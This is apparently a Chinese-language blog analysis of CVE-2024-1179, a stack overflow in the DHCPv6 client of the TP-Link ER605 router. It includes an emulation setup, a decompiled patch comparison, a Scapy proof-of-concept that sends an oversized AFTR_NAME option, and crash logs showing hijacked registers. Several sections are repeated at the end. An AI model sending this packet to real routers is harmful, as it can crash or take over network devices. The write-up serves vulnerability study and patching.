TP-Link Omada ER605 DHCPv6客户端漏洞分析 (CVE-2024-1179)<\/h1>

漏洞概述<\/h2>
CVE ID<\/strong>: CVE-2024-1179
CVSS评分<\/strong>: 7.5 (AV:A\/AC:H\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H)
受影响设备<\/strong>: TP-Link Omada ER605路由器
漏洞类型<\/strong>: 基于栈的缓冲区溢出
认证要求<\/strong>: 无需认证
攻击向量<\/strong>: 网络相邻攻击者<\/p>
该漏洞存在于TP-Link Omada ER605路由器的DHCPv6客户端实现中，由于在处理DHCP选项时缺乏对用户提供数据长度的适当验证，导致攻击者可以在root上下文中执行任意代码。<\/p>

漏洞技术细节<\/h2>
漏洞位置<\/h3>
漏洞位于dhcp6c<\/code>二进制文件中，具体在0x405F08<\/code>函数处理DHCPv6选项64(AFTR_NAME)时的memcpy操作。<\/p>
根本原因<\/h3> 在处理AFTR_NAME选项(DHCP选项64)时，程序没有正确验证用户提供的长度参数，导致可以复制超出目标缓冲区大小的数据到固定长度的栈缓冲区中。<\/p> 修复版本<\/h3> ER605(UN)_V2_2.2.4 Build 20240119<\/p> 环境搭建<\/h2> 所需工具<\/h3> QEMU (qemu-system-mips)<\/li> Debian MIPS镜像<\/li> 固件文件<\/li> IDA Pro\/Ghidra (用于逆向分析)<\/li> GDB (用于调试)<\/li> <\/ul> 固件下载<\/h3> 修复固件<\/strong>: ER605(UN)_v2_2.2.4 Build 20240119<\/a><\/li> 漏洞固件<\/strong>: ER605(UN)_v2_2.2.3 Build 20231201<\/a><\/li> <\/ul> 网络配置<\/h3> sudo ifconfig ens32 down <\/span><\/span>sudo brctl addbr br0 <\/span><\/span>sudo brctl addif br0 ens32 <\/span><\/span>sudo ifconfig br0 0.0.0.0 promisc up <\/span><\/span>sudo ifconfig ens32 0.0.0.0 promisc up <\/span><\/span>sudo dhclient br0 <\/span><\/span>sudo tunctl -t tap0 <\/span><\/span>sudo brctl addif br0 tap0 <\/span><\/span>sudo ifconfig tap0 0.0.0.0 promisc up <\/span><\/span><\/code><\/pre>QEMU启动<\/h3> sudo qemu-system-mips \ <\/span><\/span><\/span><\/span> -M malta -kernel vmlinux-3.2.0-4-4kc-malta \ <\/span><\/span><\/span><\/span> -hda debian_wheezy_mips_standard.qcow2 \ <\/span><\/span><\/span><\/span> -append "root=\/dev\/sda1"<\/span> \ <\/span><\/span><\/span><\/span> -net nic,macaddr=<\/span>00:16:3e:00:00:01 \ <\/span><\/span><\/span><\/span> -net tap,ifname=<\/span>tap0,script=<\/span>no,downscript=<\/span>no \ <\/span><\/span><\/span><\/span> -nographic <\/span><\/span><\/code><\/pre>固件模拟<\/h3> mount -t proc \/proc .\/squashfs-root\/proc <\/span><\/span>mount -o bind \/dev .\/squashfs-root\/dev <\/span><\/span>chroot .\/squashfs-root\/ sh <\/span><\/span><\/code><\/pre>漏洞分析<\/h2> 补丁对比<\/h3> 修复版本在dhcp6c<\/code>二进制中对case 64<\/code>的处理增加了长度检查：<\/p> \/\/ 漏洞版本 <\/span><\/span><\/span><\/span>case<\/span> 64<\/span>:<\/span> <\/span><\/span> if<\/span> (optlen) { <\/span><\/span> v65 =<\/span> (a3 +<\/span> 232<\/span>); <\/span><\/span> if<\/span> (a3 !=<\/span> -<\/span>232<\/span>) { <\/span><\/span> if<\/span> (cp) { <\/span><\/span> tlen =<\/span> tlen[4<\/span>]; <\/span><\/span> v64 =<\/span> 1<\/span>; <\/span><\/span> opt =<\/span> 0<\/span>; <\/span><\/span> while<\/span> (tlen) { <\/span><\/span> if<\/span> (optlen <<\/span> tlen) break<\/span>; <\/span><\/span> memcpy(&<\/span>v65[opt], cp +<\/span> v64, tlen); <\/span><\/span> v15 =<\/span> &<\/span>tlen[v64]; <\/span><\/span> if<\/span> (&<\/span>tlen[v64] >=<\/span> optlen) break<\/span>; <\/span><\/span> v16 =<\/span> &<\/span>tlen[opt]; <\/span><\/span> v64 =<\/span> (v15 +<\/span> 1<\/span>); <\/span><\/span> tlen =<\/span> v15[cp]; <\/span><\/span> opt =<\/span> (v16 +<\/span> 1<\/span>); <\/span><\/span> v16[v65] =<\/span> 46<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span>\/\/ 修复版本 <\/span><\/span><\/span><\/span>case<\/span> 64<\/span>:<\/span> <\/span><\/span> if<\/span> (!<\/span>v62) goto<\/span> LABEL_110; <\/span><\/span> v66 =<\/span> (const<\/span> char<\/span> *<\/span>)(a3 +<\/span> 232<\/span>); <\/span><\/span> if<\/span> (a3 ==<\/span> -<\/span>232<\/span> ||<\/span> !<\/span>cp) goto<\/span> LABEL_110; <\/span><\/span> size =<\/span> (unsigned<\/span> __int8<\/span> *<\/span>)(char<\/span>)size[4<\/span>]; <\/span><\/span> v65 =<\/span> 1<\/span>; <\/span><\/span> opt =<\/span> 0<\/span>; <\/span><\/span> while<\/span> (1<\/span>) { <\/span><\/span> if<\/span> (!<\/span>size) goto<\/span> LABEL_110; <\/span><\/span> if<\/span> ((int<\/span>)size <<\/span> 0<\/span> ||<\/span> v62 <<\/span> (int<\/span>)size ||<\/span> (int<\/span>)size >=<\/span> 64<\/span> -<\/span> opt) break<\/span>; <\/span><\/span> memcpy(&<\/span>v66[opt], cp +<\/span> v65, size); <\/span><\/span> v16 =<\/span> (const<\/span> char<\/span> *<\/span>)&<\/span>size[v65]; <\/span><\/span> if<\/span> ((int<\/span>)&<\/span>size[v65] >=<\/span> v62) goto<\/span> LABEL_110; <\/span><\/span> v17 =<\/span> &<\/span>size[opt]; <\/span><\/span> v65 =<\/span> (int<\/span>)(v16 +<\/span> 1<\/span>); <\/span><\/span> size =<\/span> (unsigned<\/span> __int8<\/span> *<\/span>)v16[cp]; <\/span><\/span> opt =<\/span> (int<\/span>)(v17 +<\/span> 1<\/span>); <\/span><\/span> v17[(_DWORD)v66] =<\/span> 46<\/span>; <\/span><\/span> } <\/span><\/span> sub_4043BC(6<\/span>, "getAftrName"<\/span>, "tlen is more than DHCP6_AFTRNAME_SIZE"<\/span>); <\/span><\/span> goto<\/span> LABEL_110; <\/span><\/span><\/code><\/pre>修复版本增加了以下关键检查：<\/p> 检查size是否为负数<\/li> 检查size是否超过剩余缓冲区大小(64 - opt)<\/li> 添加了错误日志输出<\/li> <\/ol> AFTR_NAME选项格式<\/h3> AFTR_NAME选项格式如下：<\/p> 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +---------------+---------------+---------------+---------------+ | OPTION_AFTR_NAME | option-len | +---------------+---------------+---------------+---------------+ | | | tunnel-endpoint-name (FQDN) | | | +---------------+---------------+---------------+---------------+ <\/code><\/pre> 其中tunnel-endpoint-name字段格式为：<\/p> 一个字节表示DNS标签长度<\/li> 标签内容<\/li> 重复直到所有标签处理完毕<\/li> 以零长度标签终止<\/li> <\/ul> 例如："aftr.example.com"编码为： \x04aftr\x07example\x03com\x00<\/code><\/p> 漏洞利用<\/h2> PoC开发<\/h3> 首先需要构造合法的DHCPv6 Reply报文<\/li> 在报文中包含恶意的AFTR_NAME选项(选项64)<\/li> 控制option和length以及对应的数据<\/li> <\/ol> 关键PoC代码<\/h3> from<\/span> scapy.all import<\/span> *<\/span> <\/span><\/span>from<\/span> scapy.layers.inet6 import<\/span> IPv6, UDP <\/span><\/span>from<\/span> scapy.layers.dhcp6 import<\/span> DHCP6_Reply, DHCP6OptServerId, DHCP6OptClientId <\/span><\/span> <\/span><\/span>interface_name =<\/span> "br0"<\/span> <\/span><\/span>source_ipv6 =<\/span> "fe80::21c:42ff:fee0:61cf"<\/span> <\/span><\/span>destination_ipv6 =<\/span> "fe80::216:3eff:fe00:1"<\/span> <\/span><\/span>source_mac =<\/span> "00:0c:29:b2:c1:98"<\/span> <\/span><\/span>destination_mac =<\/span> "00:16:3E:00:00:01"<\/span> <\/span><\/span>transaction_id =<\/span> 0x25d6bd<\/span> <\/span><\/span> <\/span><\/span># 构造以太网层<\/span> <\/span><\/span>ether_layer =<\/span> Ether(src=<\/span>source_mac, dst=<\/span>destination_mac) <\/span><\/span> <\/span><\/span># 构造IPv6层<\/span> <\/span><\/span>ipv6_layer =<\/span> IPv6(src=<\/span>source_ipv6, dst=<\/span>destination_ipv6) <\/span><\/span> <\/span><\/span># 构造UDP层<\/span> <\/span><\/span>udp_layer =<\/span> UDP(sport=<\/span>547<\/span>, dport=<\/span>546<\/span>) <\/span><\/span> <\/span><\/span># 构造DHCPv6 REPLY消息<\/span> <\/span><\/span>dhcp6_reply =<\/span> DHCP6_Reply(trid=<\/span>transaction_id) <\/span><\/span> <\/span><\/span># 构造Server ID选项<\/span> <\/span><\/span>server_id =<\/span> DHCP6OptServerId(duid=<\/span>DUID_LLT(hwtype=<\/span>1<\/span>, lladdr=<\/span>source_mac)) <\/span><\/span> <\/span><\/span># 构造恶意AFTR_NAME选项<\/span> <\/span><\/span>p1 =<\/span> b<\/span>'<\/span>\x00\x40\x03\x00<\/span>'<\/span> # 选项64<\/span> <\/span><\/span>p2 =<\/span> (b<\/span>'<\/span>\xff<\/span>'<\/span> +<\/span> b<\/span>'a'<\/span> *<\/span> 0xff<\/span>) *<\/span> 3<\/span> # 恶意payload<\/span> <\/span><\/span>p1 +=<\/span> p2 <\/span><\/span> <\/span><\/span># 组合所有层<\/span> <\/span><\/span>packet =<\/span> ether_layer \/<\/span> ipv6_layer \/<\/span> udp_layer \/<\/span> dhcp6_reply \/<\/span> p1 <\/span><\/span> <\/span><\/span># 发送数据包<\/span> <\/span><\/span>sendp(packet) <\/span><\/span><\/code><\/pre>崩溃分析<\/h3> 当发送恶意AFTR_NAME选项后，程序会在memcpy处崩溃：<\/p> Mar\/28\/2024 06:42:03: client6_recv: receive reply from fe80::21c:42ff:fee0:61cf%eth0 on eth0 Mar\/28\/2024 06:42:03: dhcp6_get_options: get DHCP option opt_64, len 768 Segmentation fault <\/code><\/pre> 寄存器状态显示已被劫持：<\/p> *V0 0x7fbda0e0 ◂— 0x61616161 ('aaaa') *V1 0x7fbdb004 *A0 0x7fbdab15 ◂— 0x61616161 ('aaaa') *A1 0x7fbd9c05 ◂— 0x61616161 ('aaaa') *A2 0xfffffffc *A3 0x61616161 ('aaaa') *T0 0x61616161 ('aaaa') <\/code><\/pre> 缓解措施<\/h2> 升级到修复版本ER605(UN)_V2_2.2.4 Build 20240119或更高版本<\/li> 在网络边界过滤异常的DHCPv6流量<\/li> 禁用不必要的DHCPv6功能<\/li> <\/ol> 参考资源<\/h2> Cisco DHCPv6文档<\/a><\/li> DHCPv6 RFC 3315<\/li> AFTR_NAME选项规范<\/li> <\/ol>

TP-Link Omada ER605 DHCPv6客户端漏洞分析 (CVE-2024-1179)<\/h1>

漏洞位置<\/h3> 漏洞位于dhcp6c<\/code>二进制文件中，具体在0x405F08<\/code>函数处理DHCPv6选项64(AFTR_NAME)时的memcpy操作。<\/p>

修复版本<\/h3> ER605(UN)_V2_2.2.4 Build 20240119<\/p>

环境搭建<\/h2>

漏洞分析<\/h2>

补丁对比<\/h3> 修复版本在dhcp6c<\/code>二进制中对case 64<\/code>的处理增加了长度检查：<\/p>

缓解措施<\/h2> 升级到修复版本ER605(UN)_V2_2.2.4 Build 20240119或更高版本<\/li> 在网络边界过滤异常的DHCPv6流量<\/li> 禁用不必要的DHCPv6功能<\/li> <\/ol> 参考资源<\/h2> Cisco DHCPv6文档<\/a><\/li> DHCPv6 RFC 3315<\/li> AFTR_NAME选项规范<\/li> <\/ol>

参考资源<\/h2> Cisco DHCPv6文档<\/a><\/li> DHCPv6 RFC 3315<\/li> AFTR_NAME选项规范<\/li> <\/ol>

漏洞位置<\/h3>
漏洞位于`dhcp6c<\/code>二进制文件中，具体在0x405F08<\/code>函数处理DHCPv6选项64(AFTR_NAME)时的memcpy操作。<\/p>`

修复版本<\/h3>
ER605(UN)_V2_2.2.4 Build 20240119<\/p>

缓解措施<\/h2>

升级到修复版本ER605(UN)_V2_2.2.4 Build 20240119或更高版本<\/li>
在网络边界过滤异常的DHCPv6流量<\/li>
禁用不必要的DHCPv6功能<\/li> <\/ol>
参考资源<\/h2>

Cisco DHCPv6文档<\/a><\/li>
DHCPv6 RFC 3315<\/li>
AFTR_NAME选项规范<\/li> <\/ol>

参考资源<\/h2>

Cisco DHCPv6文档<\/a><\/li>
DHCPv6 RFC 3315<\/li>
AFTR_NAME选项规范<\/li> <\/ol>